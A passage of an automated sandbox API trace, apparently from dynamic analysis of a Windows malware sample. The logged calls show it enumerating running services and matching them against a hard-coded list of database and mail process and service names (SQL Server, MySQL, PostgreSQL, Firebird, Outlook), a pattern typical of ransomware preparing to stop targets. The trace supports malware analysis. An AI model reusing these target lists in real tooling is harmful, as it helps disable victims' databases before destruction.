(HeapHandle=0x470000, Flags=0x0, Size=0x3c) returned 0x487a18 [0279.608] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ae238, Size=0x10) returned 0x4b3240 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x486430 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x486450 [0279.608] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b3240, Size=0x20) returned 0x4add40 [0279.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x485610 [0279.608] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0279.608] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488578 | out: hHeap=0x470000) returned 1 [0279.608] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0279.608] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b2fe8 | out: hHeap=0x470000) returned 1 [0279.608] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4ad908 [0279.623] EnumServicesStatusExW (in: hSCManager=0x4ad908, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 0 [0279.625] GetLastError () returned 0xea [0279.625] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b4e) returned 0x4b52e8 [0279.625] EnumServicesStatusExW (in: hSCManager=0x4ad908, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4b52e8, cbBufSize=0x1b4e, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4b52e8, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 1 [0279.626] CloseServiceHandle (hSCObject=0x4ad908) returned 1 [0279.649] lstrlenW (lpString="AppXSvc") returned 7 [0279.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0279.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0279.654] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0279.654] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0279.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0279.654] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0279.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0279.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0279.654] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0279.654] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0279.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0279.654] lstrlenW (lpString="Audiosrv") returned 8 [0279.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0279.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0279.654] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0279.654] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0279.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0279.655] lstrlenW (lpString="BFE") returned 3 [0279.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0279.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0279.655] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0279.655] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0279.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0279.655] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0279.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0279.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0279.655] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0279.655] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0279.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0279.655] lstrlenW (lpString="CDPSvc") returned 6 [0279.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0279.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0279.655] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0279.655] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0279.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0279.655] lstrlenW (lpString="ClickToRunSvc") returned 13 [0279.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0279.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0279.655] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0279.655] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0279.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0279.655] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0279.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0279.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0279.656] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0279.656] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0279.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0279.656] lstrlenW (lpString="CryptSvc") returned 8 [0279.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0279.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0279.656] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0279.656] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0279.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0279.656] lstrlenW (lpString="DcomLaunch") returned 10 [0279.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0279.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0279.656] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0279.656] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0279.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0279.656] lstrlenW (lpString="DeviceAssociationService") returned 24 [0279.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0279.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0279.656] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0279.656] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0279.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0279.656] lstrlenW (lpString="Dhcp") returned 4 [0279.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0279.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0279.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0279.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0279.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0279.657] lstrlenW (lpString="Dnscache") returned 8 [0279.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0279.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0279.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0279.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0279.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0279.657] lstrlenW (lpString="DPS") returned 3 [0279.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0279.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0279.657] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0279.657] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0279.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0279.657] lstrlenW (lpString="DusmSvc") returned 7 [0279.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0279.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0279.657] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0279.657] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0279.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0279.657] lstrlenW (lpString="EventLog") returned 8 [0279.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0279.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0279.658] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0279.658] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0279.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0279.658] lstrlenW (lpString="EventSystem") returned 11 [0279.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0279.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0279.658] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0279.658] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0279.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0279.658] lstrlenW (lpString="FontCache") returned 9 [0279.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0279.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0279.658] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0279.658] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0279.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0279.659] lstrlenW (lpString="gpsvc") returned 5 [0279.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0279.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0279.659] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0279.659] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0279.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0279.659] lstrlenW (lpString="iphlpsvc") returned 8 [0279.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0279.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0279.659] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0279.659] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0279.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0279.659] lstrlenW (lpString="KeyIso") returned 6 [0279.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0279.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0279.659] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0279.659] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0279.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0279.659] lstrlenW (lpString="LanmanServer") returned 12 [0279.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0279.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0279.659] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0279.659] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0279.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0279.659] lstrlenW (lpString="LanmanWorkstation") returned 17 [0279.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0279.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0279.660] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0279.660] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0279.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0279.660] lstrlenW (lpString="lfsvc") returned 5 [0279.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0279.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0279.660] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0279.660] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0279.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0279.660] lstrlenW (lpString="lmhosts") returned 7 [0279.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0279.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0279.660] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0279.660] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0279.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0279.660] lstrlenW (lpString="LSM") returned 3 [0279.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0279.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0279.660] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0279.660] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0279.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0279.660] lstrlenW (lpString="MpsSvc") returned 6 [0279.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0279.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0279.660] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0279.660] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0279.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0279.661] lstrlenW (lpString="NcbService") returned 10 [0279.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0279.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0279.661] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0279.661] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0279.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0279.661] lstrlenW (lpString="netprofm") returned 8 [0279.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0279.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0279.661] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0279.661] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0279.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0279.661] lstrlenW (lpString="NgcSvc") returned 6 [0279.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0279.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0279.661] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0279.661] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0279.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0279.661] lstrlenW (lpString="NlaSvc") returned 6 [0279.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0279.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0279.661] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0279.661] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0279.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0279.661] lstrlenW (lpString="nsi") returned 3 [0279.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0279.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0279.662] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0279.662] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0279.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0279.662] lstrlenW (lpString="PcaSvc") returned 6 [0279.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0279.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0279.662] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0279.662] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0279.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0279.662] lstrlenW (lpString="PlugPlay") returned 8 [0279.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0279.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0279.662] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0279.662] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0279.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0279.662] lstrlenW (lpString="Power") returned 5 [0279.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0279.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0279.662] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0279.662] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0279.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0279.662] lstrlenW (lpString="ProfSvc") returned 7 [0279.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0279.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0279.662] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0279.663] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0279.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0279.663] lstrlenW (lpString="RpcEptMapper") returned 12 [0279.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0279.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0279.663] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0279.663] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0279.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0279.663] lstrlenW (lpString="RpcSs") returned 5 [0279.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0279.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0279.663] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0279.663] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0279.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0279.663] lstrlenW (lpString="SamSs") returned 5 [0279.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0279.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0279.663] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0279.663] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0279.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0279.663] lstrlenW (lpString="Schedule") returned 8 [0279.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0279.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0279.663] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0279.663] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0279.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0279.663] lstrlenW (lpString="SecurityHealthService") returned 21 [0279.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0279.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0279.664] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0279.664] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0279.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0279.664] lstrlenW (lpString="SENS") returned 4 [0279.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0279.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0279.664] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0279.664] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0279.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0279.664] lstrlenW (lpString="ShellHWDetection") returned 16 [0279.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0279.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0279.664] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0279.664] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0279.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0279.664] lstrlenW (lpString="Spooler") returned 7 [0279.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0279.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0279.664] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0279.664] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0279.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0279.664] lstrlenW (lpString="StateRepository") returned 15 [0279.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0279.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0279.664] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0279.665] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0279.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0279.665] lstrlenW (lpString="SysMain") returned 7 [0279.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0279.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0279.665] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0279.665] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0279.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0279.665] lstrlenW (lpString="SystemEventsBroker") returned 18 [0279.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0279.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0279.665] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0279.665] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0279.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0279.665] lstrlenW (lpString="Themes") returned 6 [0279.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0279.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0279.665] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0279.665] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0279.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0279.665] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0279.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0279.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0279.665] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0279.665] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0279.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0279.665] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0279.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0279.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0279.666] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0279.666] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0279.666] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b52e8 | out: hHeap=0x470000) returned 1 [0279.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0279.677] Process32FirstW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.677] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, 